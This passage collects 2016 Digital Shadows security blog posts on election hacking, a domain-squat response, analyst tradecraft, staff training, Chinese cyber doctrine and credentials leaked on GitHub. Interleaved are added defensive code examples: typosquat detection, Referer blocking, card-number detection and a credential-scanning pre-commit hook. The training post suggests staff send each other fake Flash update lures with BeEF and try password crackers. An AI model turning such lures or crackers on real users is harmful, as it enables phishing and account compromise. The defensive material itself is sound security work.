    In fact, the targeting of elections is far from unique. Nation states have been involved in multiple instances in the past. In 2013, media reports revealed that Chinese government hackers gained access to the computer networks of Sens. Barack Obama and John McCain during the 2008 presidential election. The hackers sought to export a large quantity of data, such as position papers and private emails, from both candidates. Campaign staffers at the time said that they grew suspicious that they were being monitored after Chinese officials approached them to complain about foreign policy positions written in secret, internal documents that had not yet been publicized. According to media reports, it appeared that the Chinese had penetrated the campaign networks to observe how the candidates’ policies on China were being developed.

    This episode represents a more conventional intelligence collection operation, where nation state actors would more likely be interested in sensitive data that would provide a strategic advantage or allow for future planning measures. An additional motivation would be “entrenchment” and the continuation of undetected access to their target’s systems in order to maintain their strategic viewpoint. We assess it to be highly likely that similar operations targeting the current U.S. election are ongoing along with the current campaigns that involve the disclosure of public information.

    However, this election cycle appears to have revealed a variation of this model. The United States Intelligence Community and a number of security vendors and commentators have tied leaks originating from WikiLeaks, Guccifer 2.0, and DC Leaks to Russian state-sponsored actors, though this assessment remains unconfirmed. If the allegations of Russian Government involvement are true, this would be an unprecedented effort on the part of a nation state to disrupt a U.S. election through network penetration and public data leaks. Rather than being interested in the policy documents maintained in the servers of the Democratic National Congress (DNC) and Democratic Congressional Campaign Committee (DCCC), these unspecified Russian cyber actors appear to believe that the data has more value as a public disclosure. The motivation for doing so is unclear, though it may represent an effort to influence public opinion or discredit a particular candidate. Conversely, it could simply be an overt display of an actor’s power and capability and a way for them to project power onto the world stage. In spite of that, the exact nature of the operation and its ultimate objectives remain unknown.

    There are, of course, many differences between Sepúlveda’s operation and the current campaign targeting the U.S. Democratic Party. While the former was kept covert to protect the integrity of the targeted election, the latter has been largely overt and has relied on media attention to generate negative publicity.

    It is likely that cyber operations targeting either elections in general or candidates specifically will continue. Irrespective of whether these operations will be covert or overt, it is fair to expect that future elections will be similarly impacted – and not just in the United States.

    Squashing Domain Squatting Mon, 24 Oct 2016 17:18:10 +0000 Digital Shadows was recently the victim of a domain squat attempt. As we eat our own dog food, we thankfully caught and remediated it quickly. What does it mean and how did we do it? Read on, dear reader!

    What is Domain Squatting?

    Domain Squatting, also known as cybersquatting, is the practice of actors registering and using domains which impersonate companies, organizations, brands or even people without having the right to do so. Similarly, typosquatting is registering a misspelled variant of the domain.

    These types of squats can have many purposes, such as web traffic diversion for advertising revenue or defamation, re-selling the domain to the rightful owner at an inflated price, phishing visitors’ details, attacking visitors using exploit kits, or sending nefarious emails to company clients or employees.

    With over 1,500 registered top-level domains (TLDs), and an even larger number of possible misspellings, it is no longer feasible to protect yourself by buying up digital real estate. Trying to do so for even one brand name would be extremely expensive and process-intensive, and would likely still not fully protect an organization from this threat. As an alternative, organizations should proactively monitor for such domains being registered and have a defined process for dealing with infringements when they occur.
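    The monitoring approach described above, as an added example that is not Digital Shadows code: generate the common squat variants of a brand label (omission, doubling, transposition, adjacent-key and homoglyph substitution, hyphenation) and flag matching entries in a feed of newly registered domains for analyst review. The brand `examplecorp`, the owned-domain set and the registration feed are constructed placeholders.

```python
"""Typosquat candidate generation and matching against a registration feed."""

# Keys adjacent on a QWERTY keyboard, used for "fat-finger" variants.
QWERTY_NEIGHBOURS = {
    "a": "qwsz", "b": "vghn", "c": "xdfv", "d": "serfcx", "e": "wsdr",
    "f": "drtgvc", "g": "ftyhbv", "h": "gyujnb", "i": "ujko", "j": "huikmn",
    "k": "jiolm", "l": "kop", "m": "njk", "n": "bhjm", "o": "iklp",
    "p": "ol", "q": "wa", "r": "edft", "s": "awedxz", "t": "rfgy",
    "u": "yhji", "v": "cfgb", "w": "qase", "x": "zsdc", "y": "tghu",
    "z": "asx",
}
# Visually similar substitutions commonly seen in squats (applied once each).
HOMOGLYPHS = {"o": "0", "l": "1", "i": "1", "e": "3", "a": "4", "s": "5",
              "rn": "m", "m": "rn"}


def squat_variants(label):
    """Return plausible squat variants of a bare domain label (no TLD)."""
    variants = set()
    for i in range(len(label)):
        variants.add(label[:i] + label[i + 1:])            # omission
        variants.add(label[:i] + label[i] + label[i:])      # doubling
    for i in range(len(label) - 1):                         # transposition
        variants.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])
    for i, ch in enumerate(label):                          # adjacent key
        for n in QWERTY_NEIGHBOURS.get(ch, ""):
            variants.add(label[:i] + n + label[i + 1:])
    for src, dst in HOMOGLYPHS.items():                     # homoglyph
        if src in label:
            variants.add(label.replace(src, dst, 1))
    for i in range(1, len(label)):                          # hyphenation
        variants.add(label[:i] + "-" + label[i:])
    variants.discard(label)
    return variants


def classify(domain, brand, owned):
    """Return a reason string if the domain looks like a squat, else None."""
    domain = domain.lower()
    if domain in owned:
        return None
    label, _, _tld = domain.partition(".")
    if label == brand:
        return "brand label on unowned TLD"
    if label in squat_variants(brand):
        return "typo/homoglyph variant of brand"
    if brand in label:
        return "brand embedded in label"
    return None


def flag_registrations(feed, brand, owned):
    """Filter a feed of newly registered domains down to review candidates."""
    hits = []
    for domain in feed:
        reason = classify(domain, brand, owned)
        if reason:
            hits.append((domain, reason))
    return hits


# Constructed sample data: the brand, the domains it really controls, and a
# day's worth of new registrations as a monitoring feed would deliver them.
BRAND = "examplecorp"
OWNED = {"examplecorp.com"}
NEW_REGISTRATIONS = [
    "examplecorp.com",          # ours, must not be flagged
    "exarnplecorp.com",         # m -> rn homoglyph
    "examplecorp.co",           # TLD swap
    "examp1ecorp.net",          # l -> 1 homoglyph
    "exmaplecorp.com",          # transposed characters
    "examplecorp-support.com",  # brand plus suffix
    "weather-today.com",        # unrelated noise
]

if __name__ == "__main__":
    for domain, reason in flag_registrations(NEW_REGISTRATIONS, BRAND, OWNED):
        print(f"{domain:28} {reason}")
```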

    What happened?


    Figure 1: Internal alert sent by our analyst team

    As well as offering our domain squat monitoring capability to our clients, we use the same coverage for our own assets. On October 6, as part of the regular service, one of our analysts spotted a suspicious domain. The site consisted of an HTML frame loading our legitimate domain, which in turn filled the entirety of the page, so the site exactly replicated the legitimate Digital Shadows site. Upon further research, we discovered that the site had been registered a day earlier via a privacy-preserving WHOIS registration and also had an MX (mail exchange) record, which meant it could have been used to send email. There were some issues with the site as well, such as incorrect content rendering and SSL certificate failures.

    What did we do?

    After the alert was sent to our internal security team (figure 1), further investigation was conducted regarding the threat emanating from the domain. The team was looking to answer the following questions:

    • Does the site host malicious content?
    • Could it have already been used to defraud our customers or staff?
    • What is the site doing/what is its purpose?
    • How do we remediate the problem?

    As a result of the research, it appeared that the site was not hosting malicious content at the time and likely had no means of obtaining any information that may have been input by visitors. The HTML code was mostly made up of the frame to our legitimate site. It is also possible the site served malicious content selectively, e.g. only to visitors from certain IP addresses.

    Since the domain didn’t appear to create advertisement revenue or steal credentials, one of the other possible malicious uses of the site could have been sending phishing emails to our clients or staff. Since this site had a registered MX record, this was indeed possible. The domain was checked against various phishing and spam databases; however, we were unable to identify why the site was created.

    Within two working days, three mitigating actions were taken:

    1. To limit risk, we notified our clients with a reminder of the only registered domains that Digital Shadows conducts operations on.

    2. We submitted a takedown request to the domain registrar and hosting provider based on trademark infringement. A complaint to the domain registrar should be the first form of content takedown attempted. For other options, see the Uniform Domain-Name Dispute-Resolution Policy (UDRP) operated by ICANN; abuse complaints may be registered at a number of levels, including web host, ISP and domain registrar.

    3. We submitted a web app firewall request to block referrers from the domain. This prevented the site from pulling the iframe content from our legitimate site and therefore rendered the framed site inoperable.
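    The referrer-blocking step above, as an added example that is not Digital Shadows code: a small request filter that blocks requests whose Referer header points at a known squat host (or a subdomain of it), plus the response headers (`Content-Security-Policy: frame-ancestors` and `X-Frame-Options`) that stop third-party framing regardless of Referer, since browsers and privacy settings often strip or omit the Referer header. Hostnames are constructed.

```python
"""Referer-based blocking of a framing squat site, plus anti-framing headers."""
from urllib.parse import urlsplit

# Constructed: squat hosts identified by monitoring and confirmed by analysts.
BLOCKED_REFERER_HOSTS = {"examplecorp-squat.test"}


def referer_host(headers):
    """Extract the lowercase hostname from a Referer header, or None.

    Header lookup is case-insensitive; an absent or unparseable Referer
    yields None so that direct visits are never blocked by this rule.
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    value = lowered.get("referer")
    if not value:
        return None
    try:
        return urlsplit(value).hostname  # lowercased, port stripped
    except ValueError:
        return None


def is_blocked_host(host, blocked):
    """True if host equals a blocked host or is one of its subdomains."""
    return any(host == b or host.endswith("." + b) for b in blocked)


def should_block(headers, blocked=BLOCKED_REFERER_HOSTS):
    """WAF-style decision: block only when the Referer is a known squat host.

    Requests without a Referer, or from any other site (search engines,
    partner links), are allowed, so the rule cannot break legitimate traffic.
    """
    host = referer_host(headers)
    return host is not None and is_blocked_host(host, blocked)


def anti_framing_headers():
    """Response headers that stop any third-party site framing our pages."""
    return {
        "Content-Security-Policy": "frame-ancestors 'self'",
        "X-Frame-Options": "SAMEORIGIN",  # legacy fallback for older browsers
    }


if __name__ == "__main__":
    # Constructed requests: one from the squat's iframe, one direct visit.
    print(should_block({"Referer": "https://examplecorp-squat.test/"}))  # True
    print(should_block({}))                                              # False
```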


    Following the abuse notice, the initial registrant of the cybersquatted domain appears to have returned the domain to the registrar. No phishing emails were reported and we could consider this particular incident closed.

    However, it was not completely straightforward. A response from the registrar revealed that the domain had been registered using a URL forwarding service. This meant that while one endpoint address was specified in the registrar record, the actual hosting server was elsewhere and the details of it could only be obtained via a court order, which would require significant time and financial investment. This added complication is commonly used as an additional layer of protection, separating the attacker from the site.

    A motivated attacker could cause serious damage, which illustrates the vulnerability of all organizations to this type of attack. It is, therefore, very important to be prepared.


    In order to defend against domain squatting threats, every organization should:

    1. Monitor for domain registrations

    We found out about this domain’s existence very soon after its registration, which allowed us to act promptly before serious damage could be inflicted. If you don’t monitor for registrations of this kind, they will catch you off guard.

    2. Have a clearly defined incident escalation process

    Your teams need to know the correct path of escalation as well as the people in charge of the response. Furthermore, have a single point of reference for coordinating actions taken on these incidents.

    3. Have a clearly defined incident response policy

    Responsible parties should be aware of the actions that need to be carried out to investigate and remediate the problem.

    4. Trademark your assets

    There are a number of legal issues surrounding takedown requests. For example, DMCA requests can’t always be issued as they relate to copyright issues instead of trademark issues. You need to have a registered trademark of your brand name (or other assets) to be able to request a trademark infringement takedown.

    5. Inform appropriate staff, clients and suppliers

    Share the intelligence with those who need to know. By informing your employees, client base and relevant third party suppliers and peers, you can further mitigate possible phishing attempts and also help to increase their awareness of these attack types.

    Combatting Online Crime With “Needle-Rich Haystacks” Tue, 18 Oct 2016 14:09:41 +0000 At Digital Shadows our analyst team is responsible for providing both tactical situational awareness and broader, strategic awareness to our clients through incident reports, intelligence summaries and specific reports. The intelligence our analysts produce is largely based on automated collection from our wide range of sources across the visible, dark and deep Internet, so a key challenge is to identify true positives and to objectively assess the available data to draw analytically supportable conclusions.

    We use a range of machine-based techniques to sift through data points identified through automated scans, including rules-based keyword matching, regex-based searches and highly targeted queries for specific entities, such as credit card numbers featuring the Bank Identification Number of a client institution. The objective is to create “needle-rich haystacks” in order to maximize our true positive to false positive ratio. Our analysts then sift this data for potential indications of data leakage, brand-damaging content and both cyber and physical threats to our clients, and write incident alerts to provide real-time awareness of a client’s digital shadow and any potential threats they may face. This can sometimes be a much tougher task than it sounds, as the team is frequently presented with very large numbers of data points that need to be assessed (the Internet is a pretty big place), but our analyst team continuously liaises with a specialist intelligence collections team to maintain the best possible ratio of signal to noise.
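    The BIN-targeted card-number query described above, as an added example that is not Digital Shadows code: a broad regex finds every candidate digit run in a paste (the haystack), then a client-BIN prefix filter and a Luhn check-digit test discard order references, phone numbers and typos, leaving a needle-rich set for analyst review. The BINs, card numbers and paste text are constructed test values, not real cards.

```python
"""BIN-scoped card-number detection with Luhn validation over sample text."""
import re

# Candidate: 13-19 digits, optionally grouped with spaces or dashes, not
# embedded inside a longer digit run.
CANDIDATE_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_valid(digits):
    """Return True if the digit string passes the Luhn check."""
    total = 0
    for pos, ch in enumerate(reversed(digits)):
        d = int(ch)
        if pos % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(pan):
    """Keep BIN and last four so an alert never carries a full card number."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def raw_candidates(text):
    """Every digit run the broad regex matches, separators removed."""
    return [re.sub(r"[ -]", "", m.group()) for m in CANDIDATE_RE.finditer(text)]


def find_client_cards(text, client_bins):
    """Candidates narrowed to a client's BIN prefixes with a valid Luhn digit."""
    prefixes = tuple(client_bins)
    hits = []
    for pan in raw_candidates(text):
        if not pan.startswith(prefixes):   # not one of the client's ranges
            continue
        if not luhn_valid(pan):            # typo, order id or random digits
            continue
        hits.append(mask(pan))
    return hits


# Constructed sample paste: two well-known public test numbers plus noise.
SAMPLE_PASTE = """
dump #1 for sale: 4111 1111 1111 1111 exp 09/27 cvv 123
also 4111-1111-1111-1112 (copied wrong, fails Luhn)
mc: 5500 0000 0000 0004
order ref 4111111122223333 shipped
call +1 411 111 1111 1111 ext 2
"""

if __name__ == "__main__":
    print(len(raw_candidates(SAMPLE_PASTE)), "raw candidates")        # 5
    print(find_client_cards(SAMPLE_PASTE, ["411111"]))  # ['411111******1111']
```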

    For the analyst team, finding a true positive is only half the challenge – analysts must then assess the available information to determine the nature and extent of the threat and how it could be best mitigated. Not only does this require a team with fluency in many languages, but it also requires the use of a wide range of structured analytical techniques. These include Strengths, Weaknesses, Opportunities, Threats (SWOT) analysis, Analysis of Competing Hypotheses (ACH) and Red Hat analysis, to facilitate objective assessments and to ensure that every conclusion we draw is analytically sound and supported by the available evidence. We express these assessments precisely through the use of the Language of Uncertainty and source grading to ensure that our findings are clearly, concisely and accurately conveyed to our clients. In addition to these tradecraft techniques, we also use a range of specialist tools to streamline the analytical process and enable our team to dig deeper into each data point to ensure that nothing is missed. Our analysts receive training in analytical tradecraft, the use of specialist tools and the technical aspects of information security to ensure that they are equipped to handle the analytical challenges they face.


    Our assessments are supported by a curated intelligence base of profiles and incident records for prominent threat actors, tactics, techniques and procedures (TTPs), criminal websites, threat actor operations and ongoing events. These profiles inform analyst decisions when assessing the severity or nature of a threat and enable our analyst team to remain familiar with the ever-changing cyber threat landscape.

    Working on the Digital Shadows analyst team is challenging and requires a range of skills, including analytical tradecraft, technical awareness and a keen eye for detail, but it is consistently engaging, rewarding and enjoyable, as we constantly encounter new situations and must adapt our existing capabilities to new analytical problems in order to continually provide our clients with situational awareness of the threats they face every day.

    We’re always looking for talented individuals to join our growing team; check out our careers page to find out more.

    4 Tricks to Make a Cybersecurity Training a Treat Wed, 12 Oct 2016 08:53:41 +0000 A Halloween nightmare:

    Thunderstorms rage outside. Calendar alerts shriek in unison throughout the room as suspicion and anxiety rises. Lightning crashes. Users stare at their screens in horror as the dreaded “Security Training” invite rears its ugly head once again. “Say it isn’t so,” says the Head of HR. “It just can’t be… Already?” comes from someone hiding under a table in the Marketing department. “Please not again!” screams the Sales Manager as she flips her desk and runs away.

    Don’t let this scary tale become a reality at your company.

    To a security professional, it can often be shocking that people working in other fields aren’t quite as excited about this topic as us. We often think to ourselves, “But it’s so important. Why don’t they realize?” Just because this is our passion, does not mean that this is the case for everyone; but at the same time, this does not negate its importance.

    So how do we approach users without smothering them with information or seeming a little too… overly attached? Here are a few tips!

    Security needs to be:

    1. Palatable.

    Instead of handing over countless pages of security policies and expecting users to read them (nobody will read them), find ways to make this easier for users to consume.

    Converting your security policy into a fun, internally facing video is one way to keep users engaged without realizing that they’re learning. It’s sort of like hiding spinach in a strawberry banana smoothie.

    Encourage users to get involved in the production of the video. Feel free to make it amusing, while still conveying important concepts. Props like Guy Fawkes masks or ridiculous hacker costumes (think: ski mask ‘hacking’ with two keyboards) can make this TL;DR version of your security policy go a long way.

    2. Engaging.

    Training sessions can be a snooze for users. Spice them up by making them not only interactive, but actually interesting! How, you say?

    Take your users on an interactive adventure. Why not let them try out password cracking tools like John the Ripper or Cain and Abel first hand? Or have them send each other fake Flash update requests with BeEF on Kali Linux.

    This type of training can motivate users to want to protect themselves and the company and allows for them to get excited about security. It also helps them to understand the actual reason why they need to use strong passwords or exercise caution while browsing the internet.

    3. Rewarding.

    Compliment and reward your users on good security practice. “Wow, that’s a long password! I’ll bet that blows our complexity requirements out of the water!” Kind words can go a long way.

    4. Easygoing.

    Just be cool. Too much training can overwhelm users, even if it is fun. Constant workflow interruptions are inconsiderate and can result in your message falling on deaf ears. Mandatory trainings should occur no more than once or twice a year. Voluntary trainings can be hosted more frequently, however.

    As a security professional, you have the power to decide if your users are your strongest or your weakest link. Make training fun and engaging and don’t let this security nightmare become your reality.

    Digital Risk Monitoring Is A Service, Not a Distinct Capability Tue, 11 Oct 2016 11:10:19 +0000 Digital Shadows was recently recognized as a leader in the Forrester Wave on Digital Risk Monitoring. Digital risk monitoring is emerging as a must have capability that enables enterprises to better understand their digital footprints and the risks associated with them.

    When evaluating digital risk monitoring offerings, it is important to avoid hyper-focusing on individual capabilities. How many point solutions does your organization possess today? Do you have more than twenty, more than thirty? Adding more discrete capabilities to your portfolio isn’t the answer. Instead of investing in a social media monitoring and brand protection solution, you should consider investing in a complete digital risk monitoring service.

    Digital Shadows SearchLight™ extends far beyond just brand protection or social media monitoring. SearchLight offers visibility into the digital risks associated with: data leakage, cyber threats, physical security, infrastructure exposure, social media monitoring as well as brand protection.


    One of the advantages of leveraging a service with a wide breadth of coverage is that you gain context across incident types. With this additional context, you can better understand the relationship across these incident types. For example, instead of looking at typosquats in isolation, you can better understand the campaign, infrastructure and adversary behind them.

    Balancing the Scales: The PRC’s Shift to Symmetrical Engagement Thu, 06 Oct 2016 10:10:08 +0000 Over the past few years we have observed the beginnings of a fundamental change in how the People’s Republic of China (PRC) engages with adversaries in the information warfare and cyberespionage domains. As is explained below, this has been characterized by a shift from asymmetrical to symmetrical engagement. As the PRC is widely perceived to be a major threat by many states and private companies in this domain, understanding the PRC’s changing doctrines of engagement is critical to maintaining situational awareness of the wider threat landscape.

    “A mouse toying with a cat” – Unrestricted Warfare as a concept

    In 1999 the Chinese People’s Liberation Army (PLA) published Unrestricted Warfare, a doctrinal guide for how the PLA, and the PRC as a whole, would engage with regional and international opponents. Unrestricted Warfare advocated extending the concept of warfare to a range of non-conventional spheres – politics, law, and media, amongst others. At the core of this doctrine was the idea that the PRC could defeat a technologically and operationally superior adversary by engaging in unconventional operations, more commonly known in Western military circles as asymmetric warfare. This doctrinal approach was adopted principally because, at the time, the PRC lacked the capability to operate in any other way, particularly in the information warfare domain. A key principle of Unrestricted Warfare that underpinned PRC strategy was that large numbers of small-scale asymmetric operations would cumulatively degrade an opponent and result in victory for the PRC.

    Addressing the strategic imbalance – away from the asymmetric

    However, in the last few years a significant change in doctrinal attitude has begun to occur. The 2013 iteration of the Science of Military Strategy, a PLA publication issued every 10-15 years which outlines planned strategic developments, emphasised technological, organizational and operational improvements in order to begin to approach parity with the US. Following this, in 2015 the PLA began its most significant reforms of the last 30 years, instituting a process of wholesale organizational reform to restructure the force along more modern lines. A particularly notable change was the amalgamation of the PLA’s network warfare and cyberespionage units into a single entity – the Strategic Support Force (SSF).

    Figure 1 – Emblem of the SSF.

    This centralization of these types of operations, which were previously conducted by a diverse range of units, was likely intended to enable the PRC’s leadership to exercise greater control over them and thereby both increase effectiveness and reduce liabilities. In addition to a desire to improve capability, international pressure on the PRC to curtail its industrial cyberespionage operations, particularly from the US, has likely been a motivating factor for these reforms. If these measures are effective, they will likely make the SSF a much more effective tool for supporting the development and implementation of government policy and, crucially, for engaging with opponents in the network domain of warfare.


    The early indications of the PRC’s new approach can already be seen in its engagement with regional opponents in the South China Sea. The PRC has become increasingly assertive in its territorial claims, which is indicative of a desire to engage with these geostrategic issues not as a regional power, but as a “great power” on par with the US. This process is ongoing and, while the effectiveness of the reforms remains to be seen, they give us an idea of what the PRC intends to become. We can, therefore, expect to see a decline in the volume of cyberespionage being conducted by Chinese actors, particularly corporate and industrial cyberespionage, as the shift of operational responsibility to the SSF reduces operational duplication, aligns operations more closely with centrally mandated objectives, cracks down on unsanctioned operations, and improves the focus of those operations which do take place.

    Do Not Invite Them In: What “Human Error” Can Mean In Practice Thu, 06 Oct 2016 10:08:45 +0000 Whether or not you are a fan of vampire movies, you certainly know that vampires should not be invited into your house. One of the characters in the movie Lost Boys (1987) once said: “Don’t ever invite a vampire into your house, you silly boy. It renders you powerless.” This statement applies well to the topic of this blog: we should never be handing keys to cyber criminals, because this too can render you powerless.

    So-called “human errors” cause more data loss than malicious attacks, according to the UK’s Information Commissioner’s Office (ICO), and at Digital Shadows it is no secret that the largest threat to an organisation’s data is its own employees – whether deliberate or not. Back in February, a colleague published a blog that stated, “while smart cyber criminals hacking corporate systems get lots of publicity, the reality is cyber exposure incidents all too often have non-criminal, accidental causes.” The same was reiterated by the study “Managing Insider Risk Through Training & Culture” published by Experian Data Breach Resolution and the Ponemon Institute, which explained how more than half of the surveyed companies experienced security incidents due to malicious or negligent employees falling victim to cyberattacks or exposing information inadvertently.

    If “to err is human”, mistakes can also be easily corrected once you are aware of the risk. Let’s look into one type of incident often detected by our Searchlight platform here at Digital Shadows. By doing this you will gain insight into what constitutes a common “human error” that could be affecting your organization one day: easy access to code and compromised credentials on the open web. All analysed instances contain compromised credentials made available on the public website github[.]com, a web-based Git repository hosting service providing access control and several collaboration features.

    For the purpose of this post, we collected data on the number of incidents that we have sourced from GitHub in the past six months, and the result was quite revealing. Over 500 incidents included client information publicly available on GitHub. But that’s not all. Out of this total, we assessed the severity of seven incidents as “Very High” according to our in-house severity matrix, because the public repositories had been recently updated and contained identifiable client systems information and code, including a clear-text username and password set. This amounts to a fairly worrying average of one serious incident detected every month. Although we can’t say for sure why this is happening, it does not appear to be an exception in what is becoming a common – and unfortunate – scenario: login credentials being pushed to public repositories while rushing to get the work done. GitHub’s help page provides detailed instructions on how to avoid exposing sensitive data in a repository and how to remove it if already exposed.
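    The preventive check that the scenario above calls for, as an added example that is not Digital Shadows’ or GitHub’s own code: a small pre-commit style scanner that looks only at the lines a commit would add and refuses the commit if a clear-text password, private key, or credential-bearing URL appears. The regular expressions and the sample diff are constructed illustrations, not an exhaustive secret grammar.

```python
import re
import sys

# Added example (not Digital Shadows' or GitHub's code). Illustrative
# patterns for the kinds of clear-text credentials that get pushed by mistake.
CREDENTIAL_PATTERNS = {
    "password assignment": re.compile(
        r"""(?i)\b(?:pass(?:word|wd)?|pwd|secret)\s*[=:]\s*['"]?([^\s'"]{4,})"""),
    "private key block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "credentials in url": re.compile(r"\b[a-z][a-z0-9+.-]*://[^\s/:@]+:[^\s/@]+@"),
}
# Values that are obviously placeholders and should not block a commit.
PLACEHOLDERS = {"changeme", "password", "xxxx", "<password>", "example"}

def scan_diff(diff_text):
    """Scan the added lines of a unified diff (e.g. 'git diff --cached').
    Returns a list of (path, rule, line) findings; an empty list means clean."""
    findings = []
    path = "<unknown>"
    for line in diff_text.splitlines():
        if line.startswith("+++ "):            # new-side file header
            path = line[4:]
            path = path[2:] if path.startswith("b/") else path
            continue
        if not line.startswith("+"):           # only added content can leak
            continue
        added = line[1:]
        for rule, pattern in CREDENTIAL_PATTERNS.items():
            match = pattern.search(added)
            if match is None:
                continue
            if rule == "password assignment" and match.group(1).lower() in PLACEHOLDERS:
                continue
            findings.append((path, rule, added.strip()))
    return findings

# Constructed sample: a config with a real-looking password, a committed key,
# and a README placeholder that must not be flagged.
SAMPLE_DIFF = """\
diff --git a/config/db.ini b/config/db.ini
+++ b/config/db.ini
 [database]
-password = changeme
+user = app_user
+password = Winter2016!
+++ b/deploy/id_rsa
+-----BEGIN RSA PRIVATE KEY-----
+++ b/README.md
+Set password = changeme before first run.
"""

if __name__ == "__main__":
    # Hook usage: git diff --cached | python scan.py --stdin
    hits = scan_diff(sys.stdin.read() if "--stdin" in sys.argv else SAMPLE_DIFF)
    for path, rule, text in hits:
        print(f"{path}: {rule}: {text}")
    sys.exit(1 if hits else 0)                 # non-zero exit aborts the commit
```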

    Keep in mind that prevention is better than cure in such matters. Simple, well-executed preventive measures continue to be more important than complex systems. In fact, technological defences will not protect your computer if the people using it do not care as much. As previously said, “to err is human” but “to persist is devilish.” Yet the blame cannot be pinned solely on the guilty individual. According to an Experian study, companies do understand the risk posed by careless or negligent employees, which in turn could lead to a data leak or other security incidents. However, these same companies do not cultivate employee security awareness, leaving prevention largely forgotten. It appears that 60 percent of the respondents believe that employees are not knowledgeable, or have no knowledge at all, of the company’s security risks.

    Simply put, cybersecurity should be every employee’s concern. Here at Digital Shadows we don’t like to sit back